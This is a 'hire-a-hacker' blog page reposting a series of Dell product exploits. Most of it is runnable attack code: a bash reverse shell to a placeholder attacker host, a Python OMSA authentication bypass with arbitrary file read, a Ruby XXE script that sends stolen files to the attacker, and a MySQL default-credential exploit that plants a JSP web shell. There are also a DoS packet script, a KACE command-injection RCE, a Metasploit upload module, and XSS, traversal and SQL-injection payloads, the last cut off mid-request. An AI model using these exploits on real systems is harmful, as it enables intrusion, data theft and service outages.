Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863151869

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: [title] Dell Security Management Server versions prior to
11.9.0
# Exploit Author: [author] Amirhossein Bahramizadeh
# CVE : [if applicable] CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
Management
Server versions prior to 11.9.0 contain privilege escalation vulnerability
due to improper ACL of the non-default installation directory. A local
malicious user could potentially exploit this vulnerability by replacing
binaries in installed directory and taking the reverse shell of the system
leading to Privilege Escalation.

#!/bin/bash

INSTALL_DIR="/opt/dell"

# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
    chmod +x "$INSTALL_DIR/dell-exploit"

    # Wait for the reverse shell to connect to your malicious server
    nc -lvnp 1234
fi
HireHackking 
source: https://www.securityfocus.com/bid/63259/info

DELL Quest One Password Manager is prone to a security bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and gain access to sensitive areas of the application to perform unauthorized actions; this may aid in launching further attacks. 

ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false
HireHackking 
# Exploit Title: Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read
# Date: 4/27/2020
# Exploit Author: Rhino Security Labs
# Version: <= 9.4
# Description: Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station.
# CVE: CVE-2020-5377

# This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator
# Proof of concept written by: David Yesland @daveysec with Rhino Security Labs
# More information can be found here: 
# A patch for this issue can be found here: 
# https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability

from xml.sax.saxutils import escape
import BaseHTTPServer
import requests
import thread
import ssl
import sys
import re
import os

import urllib3
urllib3.disable_warnings()

if len(sys.argv) < 3:
	print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>'
	exit()

#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
#Also check out https://github.com/hantwister/FakeDellOM
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
	def do_POST(s):
		data = ''
		content_len = int(s.headers.getheader('content-length', 0))
		post_body = s.rfile.read(content_len)
		s.send_response(200)
		s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
		s.end_headers()
		if "__00omacmd=getuserrightsonly" in post_body:
			data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>")
		if "__00omacmd=getaboutinfo " in post_body:
			data = escape("<ProductVersion>6.0.3</ProductVersion>")
		if data:
			requid = re.findall('>uuid:(.*?)<',post_body)[0]
			s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?>
							<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule">
							  <s:Header>
							    <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
							    <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo>
							    <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID>
							  </s:Header>
							  <s:Body>
							    <n1:SendCmd_OUTPUT>
							      <n1:ResultCode>0</n1:ResultCode>
							      <n1:ReturnValue>'''+data+'''</n1:ReturnValue>
							    </n1:SendCmd_OUTPUT>
							  </s:Body>
							</s:Envelope>''')

		else:
			s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''')

	def log_message(self, format, *args):
		return

createdCert = False
if not os.path.isfile('./server.pem'):
	print '[-] No server.pem certifcate file found. Generating one...'
	os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
	createdCert = True

def startServer():
	server_class = BaseHTTPServer.HTTPServer
	httpd = httpd = server_class(('0.0.0.0', 443), MyHandler)
	httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
	httpd.serve_forever()

thread.start_new_thread(startServer,())

myIP = sys.argv[1]
target = sys.argv[2]

def bypassAuth():
	values = {}
	url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
	data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
	r = requests.post(url, data=data, verify=False, allow_redirects=False)
	cookieheader = r.headers['Set-Cookie']
	sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
	pathid = re.findall('Path=/(.*?);',cookieheader)
	values['sessionid'] = sessionid[0]
	values['pathid'] = pathid[0]
	return values

ids = bypassAuth()
sessionid = ids['sessionid']
pathid = ids['pathid']

print "Session: "+sessionid
print "VID: "+pathid

def readFile(target,sessid,pathid):
    while True:
        file = raw_input('file > ')
        url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file)
        cookies = {"JSESSIONID": sessid}
        r = requests.get(url, cookies=cookies, verify=False)
        print 'Reading contents of {}:\n{}'.format(file,r.content)

def getPath(path):
	if path.lower().startswith('c:\\'):
		path = path[2:]
        path = path.replace('\\','/')
        return path

readFile(target,sessionid,pathid)
HireHackking 
#!/usr/bin/ruby
#
# Exploit Title: Dell OpenManage Server Administrator 8.3 XXE
# Date: June 9, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://en.community.dell.com/techcenter/systems-management/w/wiki/1760.openmanage-server-administrator-omsa
# Software Link: http://www.dell.com/support/home/us/en/19/Drivers/DriversDetails?driverId=CCKPW
# Version: 8.3
# Tested On: RHEL7
#
# Description:
#     When using an XML parser on returned data by a remote node, OMSA does not
#     restrict the use of external entities.
#
#     This PoC first emulates a remote node (OMSA -> WS-Man -> this) and
#     requests from the victim OMSA (this -> HTTPS -> OMSA) that it be managed.
#
#     Next, the PoC requests (this -> HTTPS -> OMSA) a plugin that will attempt
#     to parse returned XML, and when the OMSA instance requests this XML from
#     the emulated node (OMSA -> WS-Man -> this), the PoC returns XML that
#     includes a XXE attack, revealing the contents of /etc/redhat-release.
#
#     Because OMSA merely requires you be authenticated to the node you are
#     managing, which we control, authentication to the victim is not required
#     to exploit this vulnerability.
#
#     To use, change line 55 to your victim IP. If you have multiple network
#     interfaces, you may wish to manually specify which one will be accessible
#     to the victim on line 60.
#
#     Note: during testing, OMSA would periodically begin rejecting connections
#     to fake nodes and would need to be restarted; do not expect multiple runs
#     against the same victim to be successful unless you can restart it.
#
# Copyright (C) 2016 hantwister
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#

require 'webrick'
require 'webrick/https'
require 'nokogiri'
require 'securerandom'
require "net/http"
require "uri"

victimip = nil
if victimip.nil?
  abort "You should modify this file and specify a victim IP."
end

attackerip = Socket.ip_address_list.detect{|intf| intf.ipv4_private?}.ip_address
print "Your IP: #{attackerip}\n\nThe victim must be able to reach you at this IP, port 5986 and 8080.\nIf it isn't right, modify this script.\nYou have ten seconds to abort this script.\n\n"

sleep 10

wsmanCallback = WEBrick::HTTPServer.new(:Port => 5986, :SSLEnable => true, :SSLCertName => [ %w[CN localhost] ])

wsmanCallback.mount_proc '/wsman' do |req, res|
  doc = Nokogiri::XML(req.body) do |config|
    config.options = Nokogiri::XML::ParseOptions::NONET
  end

  doc.xpath('//wsmid:Identify', 'wsmid' => 'http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd').each do |idRequest|
    res.status = 200
    res['Content-Type'] = 'application/soap+xml;charset=UTF-8'
    res.body = '<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>'
  end

  doc.xpath('//n1:SendCmd_INPUT', 'n1' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule').each do |dellRequest|
    dellCmd = dellRequest.child.text

    respText = " "
    if dellCmd.start_with?("__00omacmd=getuserrightsonly ")
      userRights = (7 + (7 << 16))
      respText = "<SMStatus>0</SMStatus><UserRightsMask>#{userRights}</UserRightsMask>"
    elsif dellCmd.start_with?("__00omacmd=getaboutinfo ")
      respText = "<ProductVersion>6.0.3</ProductVersion>"
    elsif dellCmd.start_with?("__00omacmd=getcmdlogcontent")
      respText = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE bogus [\n  <!ENTITY % file SYSTEM \"file:///etc/redhat-release\">\n  <!ENTITY % dtd SYSTEM \"http://#{attackerip}:8080/stage2.dtd\">\n%dtd;\n%send;\n]]>\n<bogus><blah /></bogus>"
    end

    resDoc = Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:n1=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule\"><s:Header><wsa:To> </wsa:To><wsa:RelatesTo> </wsa:RelatesTo><wsa:MessageID> </wsa:MessageID></s:Header><s:Body><n1:SendCmd_OUTPUT><n1:ResultCode>0</n1:ResultCode><n1:ReturnValue> </n1:ReturnValue></n1:SendCmd_OUTPUT></s:Body></s:Envelope>")

    resDoc.xpath('//wsa:To').first.content=doc.xpath('//wsa:Address').first.text
    resDoc.xpath('//wsa:RelatesTo').first.content=doc.xpath('//wsa:MessageID').first.text
    resDoc.xpath('//wsa:MessageID').first.content=SecureRandom.uuid

    resDoc.xpath('//n1:ReturnValue').first.content=respText

    res.status = 200
    res['Content-Type'] = 'application/soap+xml;charset=UTF-8'
    res.body = resDoc.to_xml
  end
end

wsmanThread = Thread.new do
  wsmanCallback.start
end

xxeCallback = WEBrick::HTTPServer.new(:Port => 8080)

xxeCallback.mount_proc '/stage2.dtd' do |req, res|
  res.status = 200
  res['Content-Type'] = 'application/xml-dtd'
  res.body = "<!ENTITY % all\n \"<!ENTITY &#x25; send SYSTEM 'http://#{attackerip}:8080/xxe?result=%file;'>\"\n>\n%all;\n"
end

result = nil

xxeCallback.mount_proc '/xxe' do |req, res|
  result = req.query['result']
  wsmanCallback.shutdown
  xxeCallback.shutdown
end

xxeThread = Thread.new do
  xxeCallback.start
end

trap 'INT' do
  wsmanCallback.shutdown
  xxeCallback.shutdown
  abort "Exiting"
end

httpConn = Net::HTTP.new(victimip, 1311)
httpConn.use_ssl=true
httpConn.verify_mode=OpenSSL::SSL::VERIFY_NONE

print "\n\nRequesting that the victim log onto this malicious node...\n\n"

logonUri = URI.parse("https://#{victimip}:1311/LoginServlet?flag=true&managedws=false")
logonReq = Net::HTTP::Post.new(logonUri.request_uri)
logonReq.set_form_data({"manuallogin" => "true", "targetmachine" => attackerip, "user" => "nobody", "password" => "", "application" => "omsa", "ignorecertificate" => "1"})

logonRes = httpConn.request(logonReq)

jSessionId = logonRes['Set-Cookie']
jSessionId = jSessionId[(jSessionId.index('=')+1)..(jSessionId.index(';')-1)]

vid = logonRes['Location']
vid = vid[(vid.index('&vid=')+5)..-1]

print "\n\nJSESSIONID = #{jSessionId}\nVID = #{vid}\nRequesting the victim's CmdLogWebPlugin...\n\n"

pluginUri = URI.parse("https://#{victimip}:1311/#{vid}/DataArea?plugin=com.dell.oma.webplugins.CmdLogWebPlugin&vid=#{vid}")
pluginReq = Net::HTTP::Get.new(pluginUri.request_uri)
pluginReq['Cookie']="JSESSIONID=#{jSessionId}"

pluginRes = httpConn.request(pluginReq)

wsmanThread.join
xxeThread.join

print "\n\nSuccessful XXE: #{result}\n\n" unless result.nil?
HireHackking 
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64

When authenticated as an admin, make the following adjustments to the URL
below:

1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.

https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF

In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.

The path parameter should not be changed; the provided value is essential
to bypassing a security control.
HireHackking 
source: https://www.securityfocus.com/bid/57212/info

Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable. 

https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/)
HireHackking 
'''
KL-001-2018-009 : Dell OpenManage Network Manager Multiple Vulnerabilities

Title: Dell OpenManage Network Manager Multiple Vulnerabilities
Advisory ID: KL-001-2018-009
Publication Date: 2018.11.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-009.txt


1. Vulnerability Details

     Affected Vendor: Dell
     Affected Product: OpenManage Network Manager
     Affected Version: 6.2.0.51 SP3
     Platform: Embedded Linux
     CWE Classification: CWE-285: Improper Authorization,
                         CWE-284: Improper Access Control
     Impact: Privilege Escalation
     Attack vector: MySQL, HTTP
     CVE ID: CVE-2018-15767, CVE-2018-15768

2. Vulnerability Description

     Dell OpenManage Network Manager exposes a MySQL listener that
     can be accessed with default credentials (CVE-2018-15768). This
     MySQL service is running as the root user, so an attacker can
     exploit this configuration to, e.g., deploy a backdoor and
     escalate privileges into the root account (CVE-2018-15767).


3. Technical Description

     The appliance binds on 3306/mysql using the 0.0.0.0 IP
     address. The default IPTables policy is ACCEPT and the
     rule table is empty. Using any of three default accounts,
     a malicious user can exploit native MySQL functionality to
     place a JSP shell into the directory of a web server on the
     file system and subsequently make calls into it.


4. Mitigation and Remediation Recommendation

     The vendor informed KoreLogic that all default passwords can
     be changed and are documented in the OpenManage Network Manager
     Installation Guide. Dell recommends all customers change these
     default passwords upon installation.

     The vendor has addressed these vulnerabilities in version
     6.5.3. Release notes and download instructions can be found at:

     https://www.dell.com/support/home/us/en/04/drivers/driversdetails?driverId=5XC0J


5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2018.02.16 - KoreLogic submits vulnerability details to Dell.
     2018.02.16 - Dell acknowledges receipt.
     2018.04.02 - Dell informs KoreLogic that a rememdiation plan is in
                  place and requests approximately two months continued
                  embargo on the vulnerability details.
     2018.04.23 - 45 business days have elapsed since the vulnerability
                  was reported to Dell.
     2018.05.14 - 60 business days have elapsed since the vulnerability
                  was reported to Dell.
     2018.06.05 - 75 business days have elapsed since the vulnerability
                  was reported to Dell.
     2018.06.11 - Dell informs KoreLogic that the patched version has
                  been released and asks that the KoreLogic advisory
                  remain unpublished until 2018.06.22.
     2018.06.21 - Dell requests additional time to coordinate changes
                  to the MySQL implementation, noting that this
                  driver is provided by and upstream vendor.
     2018.07.11 - 100 business days have elapsed since the
                  vulnerability was reported to Dell.
     2018.07.16 - Dell informs KoreLogic that the remediations are
                  targeted for version 6.5.3, slated for a September
                  release.
     2018.08.08 - 120 business days have elapsed since the
                  vulnerability was reported to Dell.
     2018.09.20 - 150 business days have elapsed since the
                  vulnerability was reported to Dell.
     2018.10.03 - Dell informs KoreLogic that version 6.5.3 is
                  scheduled to be released 2018.10.08.
     2018.10.11 - Dell and KoreLogic begin mutual review of
                  disclosure statements.
     2018.11.02 - Dell issues public advisory-
                  https://www.dell.com/support/article/us/en/19/sln314610;
                  180 business days have elapsed since the
                  vulnerability was reported to Dell.
     2018.11.05 - KoreLogic Disclosure.

7. Proof of Concept
'''

     #!/usr/bin/python

     # $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7
     # Dell OpenManage NetworkManager 6.2.0.51 SP3
     # SQL backdoor remote root
     #
     # [-] Starting attack.
     # [+] Connected using root account.
     # [+] Sending malicious SQL.
     # [+] Dropping shell.
     # [-] uid=0(root) gid=0(root) groups=0(root)
     #
     # # uname -a
     # Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

     from optparse import OptionParser
     from string import ascii_letters, digits
     from random import choice
     from re import compile as regex_compile
     from urllib import urlopen
     import pymysql.cursors

     banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n"""
     accounts = ['root','owmeta','oware']
     password = 'dorado'
     regex = regex_compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")

     full_path = '/opt/VAroot/dell/openmanage/networkmanager/oware/synergy/tomcat-7.0.40/webapps/nvhelp/%s.jsp' % (''.join(
         [choice(digits + ascii_letters) for i in xrange(8)]))
     shell_name = full_path.split('/')[-1]

     backdoor = """<%@ page import="java.util.*,java.io.*"%>
     <%
     if (request.getParameter("cmd") != null) {
         String m = request.getParameter("cmd");
         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
         OutputStream os = p.getOutputStream();
         InputStream in = p.getInputStream();
         DataInputStream dis = new DataInputStream(in);
         String disr = dis.readLine();
         while ( disr != null ) {
             out.println(disr);
             disr = dis.readLine();
         }
     }
     %>

     def do_shell(ip_address):
         fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % ('sudo sh -c id'))
         print "[-] %s\n" % fd.read().strip()
         fd.close()
         while True:
             try:
                 cmd = 'sudo sh -c %s' % raw_input("# ")
                 if ('exit' in cmd or 'quit' in cmd):
                     break
                 fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % (cmd))
                 print fd.read().strip()
                 fd.close()
             except KeyboardInterrupt:
                 print "Exiting."
                 exit(0)
         return False

     if __name__=="__main__":
       print banner
       parser = OptionParser()
       parser.add_option("--host",dest="host",default=None,help="Target IP address")
       o, a = parser.parse_args()
       if o.host is None:
           print "[!] Please provide the required parameters."
           exit(1)
       elif not regex.match(o.host):
           print "[!] --host must contain an IP address."
           exit(1)
       else:
           print "[-] Starting attack."
           try:
               for user in accounts:
                   conn = pymysql.connect(host=o.host,
                                          user=user,
                                          password=password,
                                          db='mysql',
                                          cursorclass=pymysql.cursors.DictCursor
                                         )
                   if conn.user is user:
                       print "[+] Connected using %s account." % (user)
                       cursor = conn.cursor()
                       print "[+] Sending malicious SQL."
                       table_name = ''.join(
                           [choice(digits + ascii_letters) for i in xrange(8)])
                       column_name = ''.join(
                           [choice(digits + ascii_letters) for i in xrange(8)])
                       cursor.execute('create table %s (%s text)' % (table_name, column_name))
                       cursor.execute("insert into %s (%s) values ('%s')" % (table_name, column_name, backdoor))
                       conn.commit()
                       cursor.execute('select * from %s into outfile "%s" fields escaped by ""' % (table_name,full_path))
                       cursor.execute('drop table if exists `%s`' % (table_name))
                       conn.commit()
                       cursor.execute('flush logs')
                       print "[+] Dropping shell."
                       do_shell(o.host)
                       break
           except Exception as e:
               if e[0] == '1045':
                   print "[!] Hardcoded SQL credentials failed." % (e)
               else:
                   print "[!] Could not execute attack. Reason: %s." % (e)
               exit(0)

'''
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
'''
HireHackking 
"""
Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015 
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24

-----------------------------------------------------------------------------------------------

Advisory Details:

Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.

Proof of concept script:
"""

#!/usr/bin/python
import socket as so
from struct import *

server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"  
d += "\x01" 

#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6  
d += "\x00" # null byte

##
# send it

s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()

"""
-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.

The fix done by Dell was not checked by the researcher.

-----------------------------------------------------------------------------------------------
"""
HireHackking 
#!/usr/bin/python
# Exploit Title: Dell KACE Systems Management Appliance (K1000) <= 6.4.120756 Unauthenticated RCE
# Version:       <= 6.4.120756
# Date:          2019-04-09
# Author:        Julien Ahrens (@MrTuxracer)
# Software Link: https://www.quest.com/products/kace-systems-management-appliance/
# Write-up:      https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
# Note:          The software is maintained by Quest now, but the vulnerability was fixed while Quest was part of Dell.            
#
# Usage: python3 exploit.py https://localhost 'sleep 10'

import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target_url = sys.argv[1]
payload = sys.argv[2]

r = requests.post(target_url + '/service/krashrpt.php', data={
    'kuid' : '`' + payload + '`'
    }, verify=False)

print('Response: %s %s\nKACE Version: %s\nResponse time: %ss' % (r.status_code, r.reason, r.headers['X-DellKACE-Version'], r.elapsed.total_seconds()))
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell KACE K1000 File Upload',
      'Description'    => %q{
          This module exploits a file upload vulnerability in Kace K1000
        versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
        which allows unauthenticated users to execute arbitrary commands
        under the context of the 'www' user.

        This module also abuses the 'KSudoClient::RunCommandWait' function
        to gain root privileges.

        This module has been tested successfully with Dell KACE K1000
        version 5.3.
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Platform'       => 'unix', # FreeBSD
      'Arch'           => ARCH_CMD,
      'Author'         =>
        [
          'Bradley Austin (steponequit)', # Initial discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00\x27",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DisclosureDate' => 'Mar 7 2014'))
  end

  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end
    if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'
      if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/
        vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")
        if $1.to_i == 5 && $2.to_i <= 3                         # 5.0 to 5.3
          return Exploit::CheckCode::Vulnerable
        elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849  # 5.4 prior to 5.4.76849
          return Exploit::CheckCode::Vulnerable
        elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547  # 5.5 prior to 5.5.90547
          return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
      end
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    # upload payload
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
    payload_path = "/kbox/kboxwww/tmp/"
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")
    res = send_request_cgi(
      'uri' => normalize_uri('service', 'kbot_upload.php'),
      'method' => 'POST',
      'vars_get' => Hash[{
        'filename' => fname,
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
        'checksum' => 'SCRAMBLE',
        'mac' => rand_text_alphanumeric(rand(8) + 5),
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),
        'version' => rand_text_alphanumeric(rand(8) + 5),
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],
      'data' => post_data)

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Payload uploaded successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
    end

    # execute payload
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Payload executed successfully')
    elsif res.code && res.code == 404
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/65029/info

Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected. 

Proof of Concept
Page: /service/kbot_service.php
Web method: getUploadPath
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
SOAPAction: "urn:#getUploadPath"
Content-Length: 543

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
